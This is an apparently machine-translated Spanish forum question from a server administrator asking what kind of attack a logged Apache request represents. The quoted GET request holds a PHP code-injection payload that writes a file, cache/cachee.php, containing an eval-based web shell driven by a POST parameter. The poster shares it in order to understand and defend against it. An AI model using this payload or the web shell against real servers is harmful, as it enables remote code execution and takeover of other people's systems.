Hoy hemos recibido la siguiente solicitud en el archivo de registros de acceso de Apache.
"GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7C%3C-'; HTTP/1.1" 200 42303
Como se ve claramente en la URL de la solicitud anterior, el pirata informático intenta intentar POST los datos o el archivo a través de la solicitud GET y, sorprendentemente, tiene 200 Código de estado en estado de respuesta.
¿Qué tipo de intento de piratería es?
Nota: - Por razones de seguridad, hemos bloqueado todas las solicitudes POST, excepto la URL de algunos formularios en nuestro servidor.
Por lo tanto, cualquier pirata informático que esté intentando publicar algunos datos maliciosos en nuestro servidor obtendrá 403 Código de estado en Respuesta
sobre el pirata informático PUBLICADO Algunos datos a través de la Solicitud GET y él tiene 200 Código de estado en Respuesta.
Por favor, ayúdame a saber qué tipo de técnica de pirateo es esto.